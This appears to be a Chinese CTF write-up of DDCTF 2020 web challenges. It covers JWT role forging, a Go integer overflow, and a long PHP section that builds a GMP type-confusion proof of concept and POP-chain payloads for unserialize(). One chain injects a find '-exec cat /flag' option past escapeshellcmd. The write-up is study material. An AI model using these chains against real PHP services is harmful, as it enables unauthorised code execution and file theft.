难哭了!😭

web

Web签到题

传下参,很明显是JWT

userRole改成ADMIN,密钥设置成admin成功得到客户端,后来才知道这个密码好像和用户名一样

接着就不会了

卡片商店

go语言整数溢出漏洞,直接向朋友借1844674407370955161个,发现:

很明显发生了溢出,然后把借的还了兑换礼物就能得到

1
url: /flag , SecKey: Udc13VD5adM_c10nPxFu@v12

访问后提示不是幸运玩家,找到了伪造cookie的工具:https://github.com/EddieIvan01/secure-cookie-faker

Overwrite Me

源码:

<?php
// Silence every diagnostic for this script (warnings from include()/unserialize() below never reach the client).
error_reporting(0);
class MyClass
{
    // Forced to 1 by __wakeup() on every unserialize() of this class.
    var $kw0ng;
    // Appended to the find command in get_flag(); the script assigns a fixed string before unserialize().
    var $flag;

    public function __wakeup()
    {
        $this->kw0ng = 1;
    }

    /**
     * Runs `find /FlagNeverFall <flag>` through the shell; system() returns the last output line.
     *
     * escapeshellcmd() only neutralises shell metacharacters. It does not stop additional
     * find options from being passed in $flag, so whoever controls $flag controls what find
     * does. escapeshellarg() per argument, or no shell at all, is the fix.
     */
    public function get_flag()
    {
        $command = sprintf('find /FlagNeverFall %s', escapeshellcmd($this->flag));

        return system($command);
    }
}

class Prompter
{
    // No setter: from outside the class hierarchy this can only be populated by unserialize().
    protected $hint;

    public function execute($value)
    {
        // include() of a caller-chosen path: a local file inclusion sink. __invoke() only
        // filters a denylist of wrapper names; it does not pin the path to a directory.
        include($value);
    }

    public function __invoke()
    {
        // Denylist of stream wrappers and traversal fragments. Anything not listed
        // (a plain relative filename, for instance) still reaches include().
        $denylist = "/gopher|http|file|ftp|https|dict|zlib|zip|bzip2|data|glob|phar|ssh2|rar|ogg|expect|\.\.|\.\//i";
        if (preg_match($denylist, $this->hint) === 1) {
            die("Don't Do That!");
        }

        $this->execute($this->hint);
    }
}

class Display
{
    public $contents;
    public $page;

    public function __construct($file='/hint/hint.php')
    {
        $this->contents = $file;
        print "Welcome to DDCTF 2020, Have fun!<br/><br/>";
    }

    /**
     * Note: `$this->contents()` is a method call, and no method named contents exists on
     * this class, so a string cast does not go through the $contents property.
     */
    public function __toString()
    {
        return $this->contents();
    }

    /**
     * Runs on unserialize(). Writes to, then unsets, members of whatever object sits in
     * $page. The unset() is what fires __unset() on a Repeater placed there (its $cont is
     * private), which makes this the entry point of the gadget chain the writeup builds.
     */
    public function __wakeup()
    {
        $this->page->contents = 'POP me! I can give you some hints!';
        unset($this->page->cont);
    }
}

class Repeater
{
    // Never assigned; because it is private, unset() of it from outside routes to __unset().
    private $cont;
    // Whatever callable is placed here is what __unset() executes.
    public $content;

    public function __construct()
    {
        $this->content = [];
    }

    /**
     * Magic handler for unset() of an inaccessible property. $key is ignored and $content is
     * called as a function: a closure, a function name, or an [object, 'method'] /
     * ['Class', 'method'] pair all work, so after unserialize() of untrusted data this is
     * a call to an arbitrary method of an arbitrary class.
     */
    public function __unset($key)
    {
        $callable = $this->content;

        return $callable();
    }
}

class Info
{
    /**
     * Dumps phpinfo() on construction. The eval() wraps a constant string, so it behaves
     * exactly like a direct phpinfo() call.
     */
    public function __construct()
    {
        eval('phpinfo();');
    }
}

$show = new Display();
$bullet = $_GET['bullet'];

if (!isset($bullet)) {
    highlight_file(__FILE__);
    die("Give Me Something!");
} elseif ($bullet == 'phpinfo') {
    $infos = new Info();
} else {
    // Per the note in this writeup, the GMP type-confusion PoC only replaces $mc->flag
    // when this allocation is absent, so it is part of the challenge's defences.
    $obstacle = new stdClass;
    $mc = new MyClass();
    $mc->flag = "MyClass's flag said, Overwrite Me If You Can!";
    // unserialize() of a raw request parameter: every __wakeup/__unset/__invoke gadget
    // defined above is reachable from here. Never unserialize() untrusted input.
    @unserialize($bullet);
    echo $mc->get_flag();
}

访问/hint/hint.php提示和GMP扩展相关,搜了搜发现是GMP扩展反序列化类型混淆漏洞:https://hackerone.com/reports/198734

测试发现,去除`$obstacle = new stdClass;`后可以替换参数

<?php
class MyClass
{
    var $kw0ng;
    var $flag;

    public function __wakeup()
    {
        $this->kw0ng = 1;
    }

    // Harmless stand-in for the challenge's system() call: just prints the current $flag,
    // which is enough to show whether unserialize() managed to overwrite it.
    public function get_flag()
    {
        printf("%s\n", $this->flag);
    }
}
// $obstacle = new stdClass;
$mc = new MyClass();
$mc->flag = "id";
// Local reproduction of the GMP unserialize type confusion the note above links to
// (hackerone 198734). When it works, get_flag() prints the replaced value rather than "id".
$inner = 's:1:"1";a:2:{s:4:"flag";s:6:"whoami";i:0;O:7:"MyClass":1:{s:5:"kw0ng";R:2;}}';
$exp = sprintf('a:1:{i:0;C:3:"GMP":%d:{%s}}', strlen($inner), $inner);
// echo urlencode($exp);
@unserialize($exp);
$mc->get_flag();
// var_dump($obstacle);

构造POP链:

<?php
// Suppress all diagnostics while building the payload.
error_reporting(0);

class Prompter
{
    // Serialization-only stand-in: carries the filename the target's __invoke() would include().
    protected $hint = 'EOf9uk3nSsVFK1LQ.php';
}

class Display
{
    public $contents;
    public $page;

    // Head of the chain: on the target, Display::__wakeup() unsets $page->cont, which
    // fires Repeater::__unset().
    public function __construct()
    {
        $this->page = new Repeater;
    }
}

class Repeater
{
    private $cont;
    public $content;

    // Prompter defines __invoke(), so the `$func()` inside the target's __unset() calls it
    // and include()s the hint file.
    public function __construct()
    {
        $this->content = new Prompter;
    }
}
// Serialize the Display gadget and print it URL-encoded for use as the GET parameter.
echo urlencode(serialize(new Display()));

可以文件包含,但从phpinfo看有open_basedir限制,向页面POST上传文件无响应

后来才知道,原来是可以调用任意类的任意方法的,漏洞点就在于:

/**
 * Calls whatever callable is stored in $content; $key (the property being unset) is ignored.
 */
public function __unset($key)
{
    $callable = $this->content;

    return $callable();
}

$func()那里,如果可控的话,可以调用任意类中的方法,看一个例子:

<?php
// Suppress all diagnostics, including any deprecation notice the static-style calls below may raise.
error_reporting(0);
class T
{
    public function test()
    {
        print 456;
    }

    public function test1($a)
    {
        print $a;
    }
}

$a = [new T, 'test'];
$a();

// Class and method names are case-insensitive, so 't'/'Test' resolve to T::test().
// test() is not static: PHP 7 only emits E_DEPRECATED (hidden by error_reporting(0)),
// while PHP 8 throws an Error for this call and the next one.
$b = ['t', 'Test'];
$b();

$c = ['t', 'test1'];
$c('456');

// All three examples above print 456

由此,pop链可以为:

<?php
// Suppress all diagnostics while building the payload.
error_reporting(0);

class MyClass
{
    var $kw0ng;
    var $flag;

    // $flag is what the target's get_flag() appends to `find /FlagNeverFall`. escapeshellcmd()
    // escapes shell metacharacters only, so find options placed here survive the escaping.
    public function __construct()
    {
        $this->flag = '-exec cat /flag ;';
    }

    public function __wakeup()
    {
        $this->kw0ng = 1;
    }
}

class Display
{
    public $contents;
    public $page;

    // Head of the chain: on the target, Display::__wakeup() unsets $page->cont, which
    // fires Repeater::__unset().
    public function __construct()
    {
        $this->page = new Repeater;
    }
}

class Repeater
{
    private $cont;
    public $content;

    // [object, 'method'] callable: the `$func()` inside the target's __unset() becomes
    // MyClass::get_flag(). Only the object's state is serialized, so the method body
    // comes from the target's own class definition and need not exist here.
    public function __construct()
    {
        $this->content = [new MyClass, 'get_flag'];
    }
}
// Serialize the Display gadget and print it URL-encoded for use as the GET parameter.
echo urlencode(serialize(new Display()));
